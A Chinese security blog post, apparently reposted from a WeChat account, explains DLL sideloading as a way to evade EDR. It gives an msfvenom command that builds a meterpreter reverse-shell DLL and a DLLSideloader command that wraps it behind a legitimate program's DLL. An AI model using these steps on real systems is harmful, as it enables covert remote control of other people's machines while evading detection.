Sideloading DLL攻击

admin 2021年9月4日06:38:12评论245 views字数 787阅读2分37秒阅读模式

今天看到了国外的一个白皮书,地址如下:


https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deploy/jcp-01-00021.pdf


内容主要是各类技术在遇到EDR时能不能成功的绕过。


Sideloading DLL攻击


最后以一份表格总结了各类功能以及绕过效果:


Sideloading DLL攻击


我们可以看到,dll几乎绕过了所有的EDR,而这里的DLL指的便是Sideloading DLL。


Sideloading DLL最早应该是在一份APT报告中被提出来的,即DLL侧加载。

文档地址:


https://www.recordedfuture.com/apt10-cyberespionage-campaign/?__cf_chl_jschl_tk__=pmd_VKrHUzdleNocPJnRemvxCVGmjY8gkMwlsZM361GthcI-1629625791-0-gqNtZGzNAjujcnBszQil


Sideloading DLL攻击


原理如下:


Sideloading DLL攻击

即中间经过转发来加载恶意dll


利用方法:


首先找到一个存在dll加载(或劫持)的程序,然后使用msf生成dll


msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f dll -a x86 > payload.dll


然后使用DLLSideloader来生成我们的转发dll,工具地址:


https://github.com/SkiddieTech/DLLSideloader


然后生成所需的文件即可


Invoke-DLLSideLoad libcurl.dll payload.dll


然后执行exe文件,即可获取session。







     ▼
更多精彩推荐,请关注我们


请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!


Sideloading DLL攻击



本文始发于微信公众号(鸿鹄实验室):Sideloading DLL攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日06:38:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Sideloading DLL攻击https://cn-sec.com/archives/468399.html

发表评论

匿名网友 填写信息